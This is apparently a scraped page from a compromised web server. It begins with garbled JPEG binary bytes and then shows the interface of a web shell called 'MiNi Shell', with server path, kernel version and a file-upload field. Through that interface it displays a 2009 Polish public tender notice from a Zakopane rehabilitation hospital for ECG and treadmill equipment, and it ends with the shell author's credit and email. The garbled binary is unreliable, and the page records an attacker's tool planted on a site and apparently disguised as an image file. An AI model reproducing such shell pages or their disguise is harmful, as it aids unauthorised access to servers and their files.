JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20091003/344426-N-2009.html

<p class="kh_header"><b>Zakopane: Dostawa i montaż fabrycznie nowego sprzętu medycznego (rok produkcji 2009) t.j.  1) Systemu analizy EKG metodą Holtera oraz 3-kanałowy rejestrator holterowski EKG 2) systemu badań wysiłkowych  na stanowisku diagnostycznym oraz bieżnia do prób wysiłkowych, dla Wojewódzkiego Szpitala Rehabilitacyjnego im. dr S. Jasińskiego w Zakopanem, ul. Ciągłówka 9, 34-500 Zakopane, według specyfikacji asortymentu oraz parametrów technicznych</b><br>
<b>Numer ogłoszenia: 344426 - 2009; data zamieszczenia: 03.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Rehabilitacyjny im. dr S. Jasińskiego w Zakopanem , ul. Ciągłówka 9, 34-500 Zakopane, woj. małopolskie, tel. 018 2068066 w. 22, faks 018 2068141.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż fabrycznie nowego sprzętu medycznego (rok produkcji 2009) t.j.  1) Systemu analizy EKG metodą Holtera oraz 3-kanałowy rejestrator holterowski EKG 2) systemu badań wysiłkowych  na stanowisku diagnostycznym oraz bieżnia do prób wysiłkowych, dla Wojewódzkiego Szpitala Rehabilitacyjnego im. dr S. Jasińskiego w Zakopanem, ul. Ciągłówka 9, 34-500 Zakopane, według specyfikacji asortymentu oraz parametrów technicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór Wykonawcy, który własnym środkiem transportu dostarczy, do  Wojewódzkiego Szpitala Rehabilitacyjnego im. dr S. Jasińskiego w Zakopanem przedmiot zamówienia tj.  
1) Systemu analizy EKG metodą Holtera oraz 3-kanałowy rejestrator holterowski EKG 
2) systemu badań wysiłkowych  na stanowisku diagnostycznym oraz bieżnię do prób wysiłkowych,  
według specyfikacji asortymentu oraz parametrów technicznych określonych w załaczniku nr 1 do SIWZ / Umowy oraz dokona montażu oraz przeprowadzi 20-godzinne  szkolenie dla 10 pracowników w Wojewódzkim Szpitalu Rehabilitacyjnym im. dr S. Jasińskiego w Zakopanem, ul. Ciągłówka 9, 34-500 Zakopane. Po dostawie, montażu oraz szkoleniu zostanie wystawiony protokół odbioru wraz z dokumentem gwarancyjnym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.12.10.00-4, 33.12.30.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy potwierdzający spełnienie warunków (art. 22 Pzp - załącznik nr 2 do SIWZ):
1.	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
3.	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 

Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
1.	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Pzp.
2.	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 i ust. 2 Pzp.


XIII.	Kryteria oceny oferty i ich znaczenie:
1.	Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:
a)	oferta, co do formy opracowania i treści spełnia wymagania określone niniejszą specyfikacją,
b)	z ilości i treści złożonych dokumentów wynika, że wykonawca spełnia warunki formalne określone niniejszą specyfikacją,
c)	złożone oświadczenia, dokumenty, zaświadczenia są aktualne i podpisane przez osoby uprawnione,
d)	oferta została złożona w określonym przez Zamawiającego terminie,
e)	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego.
2.	Ustala się następujące kryteria oceny ofert i ich wagi procentowe 
1.	Kryterium nr 1- Cena						- 80%
2.	Kryterium nr 2- Warunki gwarancji, 
serwisu gwarancyjnego i pogwarancyjnego 			- 20%
								
Sposób obliczania wartości punktowej poszczególnych kryteriów


Kryterium nr 1 wymienione  w pkt. 2  oceniane będzie wg wzoru:

X = W  x  Cmin / Cn x100
	gdzie:
	   X          - wartość punktowa ocenianego kryterium
 	   W         - waga procentowa ocenianego kryterium
	   Cmin    - najmniejsza cena  ze złożonych ofert 
	   Cn        - cena oferty ocenianej 
 
Kryterium nr 2  wymienione  w pkt. 2  oceniane będzie wg wzoru:
X = W  x Gn/Gmax  x100
	gdzie:
X          - wartość punktowa ocenianego kryterium
W         - waga procentowa ocenianego kryterium
Gmax    - max.  Ilość punktów możliwych do zdobycia  za wszystkie pozycje z załącznika 2
Gn        - ilość punktów oferty ocenianej zdobytych za oferowane parametry w zał. Nr 6 punkt V

Ocena końcowa oferty:
Jest to suma punktów uzyskanych za  wszystkie  kryteria wymienione w pkt. 2

  Zamawiający udzieli zamówienia Oferentowi, którego oferta spełnia wymagania niniejszej specyfikacji i jest zgodna z ustawą - Prawo zamówień publicznych
 oraz zostanie uznana za najkorzystniejszą - otrzyma największą liczbę punktów. 
        		
Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie 
lub więcej ofert przedstawia taki sam bilans kryterium nr 1i kryterium nr 2  - Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną ( art. 91 ust. 4)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie  art. 24 ustawy z dnia 29 stycznia 2004r. z późn. zm. - Pzp składa następujące dokumenty: 

WARUNKI PODMIOTOWE:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
3.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie  z art. 22, ust. 1 Pzp sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.
4.	Oświadczenie Wykonawcy zgodne z art. 24, ust 1 i ust. 2 Pzp sporządzone według wzoru stanowiącego załącznik nr 3 do SIWZ.

B.	W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
1.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie; (art. listy referencyjne), z którego wynika, że Wykonawca w ciągu ostatnich trzech latach wykonał, co najmniej trzy zamówienia polegające na wykonaniu dostawy , o wartości porównywalnej do przedmiotowego zamówienia w złotych każde zamówienie udokumentowane referencjami (zakres prac wymieniony w wykazie musi mieć odzwierciedlenie w załączonych referencjach) - sporządzone według wzoru stanowiącego - załącznik nr 5.
WARUNKI PRZEDMIOTOWE:
1.	Specyfikacja asortymentu oraz parametrów technicznych zgodnie z - 
załącznikiem nr 1.

Ponadto należy w ofercie złożyć formularz ofertowo - cenowy  według wzoru                       - załącznik nr 6 do SIWZ oraz zaakceptowany projekt umowy regulujący zobowiązania stron - załącznik nr 7 do SIWZ.
 
C	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
Zamiast dokumentu, o którym mowa w pkt. A1 składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że:
1.	Nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w postępowaniu.
Oraz pozostałe dokumenty składające się na ofertę.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu wskazanego w niniejszym pkt. C, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju,                 w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż w terminie określonym w niniejszym pkt. C.

D	Dokumenty wymagane w przypadku składania oferty wspólnej: 
Dokumenty składane osobno:
Oświadczenia i dokumenty opisane w pkt. A. 

Dokumenty składane wspólnie: 
Specyfikacja asortymentu oraz parametrów technicznych - załącznik nr 1 do SIWZ.
Formularz ofertowo -cenowy - załącznik nr 6 do SIWZ.
Zaakceptowany projekt umowy - załącznik nr 7 do SIWZ.
Oraz dokumenty wymienione w punkcie B.  

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę
 
KAŻDY WARUNEK ZOSTANIE OCENIONY NA ZASADZIE: SPEŁNIA / NIE SPEŁNIA..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Warunki gwarancji, serwisu gwarancyjnego i pogwarancyjnego - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl  - zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Rehabilitacyjny im. dr S. Jasińskiego w Zakopanem
34-500 Zakopane, ul. Ciągłówka 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 10:00, miejsce: Wojewódzki Szpital Rehabilitacyjny im. dr S. Jasińskiego w Zakopanem
34-500 Zakopane, ul. Ciągłówka 9    Sekretariat - pokój 206.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com